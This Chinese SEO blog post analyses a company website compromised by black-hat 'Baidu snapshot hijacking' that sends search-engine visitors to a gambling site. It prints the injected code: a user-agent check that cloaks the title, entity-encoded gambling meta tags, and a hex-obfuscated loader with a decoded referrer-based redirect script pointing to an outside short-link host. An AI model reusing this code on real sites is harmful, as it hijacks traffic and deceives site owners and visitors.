seo微媒体_黑帽SEO百度快照劫持:赛思奥官网遭百度快照劫持!

seo微媒体_黑帽SEO百度快照劫持:赛思奥官网遭百度快照劫持!

seo微媒体_黑帽SEO百度快照劫持:赛思奥官网遭百度快照劫持!

今天浏览网站,偶然发现一公司官网,遭BC快照劫持!

不知道这个公司官网是已经废弃了,被该劫持的人购买了,还是被人SHELL了。

今天刚好借这个网站,给大家说下什么是百度快照劫持!

废话不讲,直接上视频!

 

 

 

【1】

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") === -1){document.title ="我只敷你 - 江苏赛思奥生物技术有限公司旗下护肤品牌"}</script>

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}</script>
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】
<title>&#20122;&#28216;&#95;&#20122;&#28216;&#38598;&#22242;&#95;&#20122;&#28216;&#23448;&#32593;&#95;&#26032;&#28010;&#20307;&#32946;</title>
<meta name="keywords" content="&#20122;&#28216;&#44;&#20122;&#28216;&#38598;&#22242;&#44;&#20122;&#28216;&#23448;&#32593;&#44;&#65;&#71;&#20122;&#28216;&#23448;&#32593;&#44;&#20122;&#28216;&#38598;&#22242;" />
<meta name="description" content="&#65;&#71;&#20122;&#28216;&#23089;&#20048;&#38598;&#22242;&#23448;&#32593;&#32447;&#36335;&#26816;&#27979;&#12304;&#87;&#87;&#87;&#46;&#65;&#71;&#56;&#46;&#88;&#73;&#78;&#12305;

&#65;&#71;&#23089;&#20048;&#38598;&#22242;&#21482;&#20026;&#38750;&#21516;&#20961;&#21709;&#20301;&#20110;&#33778;&#24459;&#23486;&#39532;&#23612;&#25289;&#44;&#33778;&#24459;&#23486;

&#20122;&#28216;&#38598;&#22242;&#36816;&#33829;&#44;&#65;&#71;&#20122;&#28216;&#23448;&#32593;&#20026;&#29992;&#25143;&#25552;&#20379;&#26356;&#22909;&#30340;&#23433;&#20840;&#20445;

&#38556;&#12290;&#65;&#71;&#20122;&#28216;&#38598;&#22242;&#33268;&#21147;&#20110;&#25171;&#36896;&#20122;&#27954;&#26368;&#20339;&#30340;&#28216;&#25103;&#24179;&#21488;&#65281;&#10;" />

我们再来看这三行代码,这三行代码好像看不懂,不过他采用的是Unicode编码,解码以后,是

<title>亚游_亚游集团_亚游官网_新浪体育</title>
<meta name="keywords" content="亚游,亚游集团,亚游官网,AG亚游官网,亚游集团" />
<meta name="description" content="AG亚游娱乐集团官网线路检测【WWW.AG8.XIN】AG娱乐集团只为非同凡响位于菲律宾马尼拉,菲律宾亚游集团运营,AG亚游官网为用户提供更好的安全保障。AG亚游集团致力于打造亚洲最佳的游戏平台!。

【3】有的还会加上跳转代码,如


<script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('
\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a
\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x
72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x74\x2e\x63\x6e\x2f\x52\x6e\x
59\x30\x68\x4c\x6c\x22\x3e\x3c\x2
f\x73\x63\x72\x69\x70\x74\x3e');
</script>
解密出来就是这段话:
< script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src="http://t.cn/***"></script>'); < /script>
意思是向首页中插入这行代码

那为什么还是会跳转呢?就是这行代码的事,这个转代码其实是向原网页插入一JS JS原地址 :
http://SEO**.com/**.js

而JS的内容是如下内容:
document.writeln("<script LANGUAGE=\'Javascript\'>");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\'baidu\')>0 || s.indexOf(\'sogou\')>0 || s.indexOf(\'soso\')>0 ||s.indexOf(\'
sm\')>0 ||s.indexOf(\'uc\')>0 ||s.indexOf(\'bing\')>0 ||s.indexOf(\'yahoo\')>0 ||s.indexOf(\'so\')>0 ||s.indexOf(\'google\')>0)");
document.writeln("location.href=\'http://t.cn/***\';");
document.writeln("</script>");
document.writeln("");
document.writeln("");

明白的人就懂了,说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址
就是这个BC网站,这些黑客真是煞费苦心。

seo微媒体_黑帽SEO百度快照劫持:赛思奥官网遭百度快照劫持!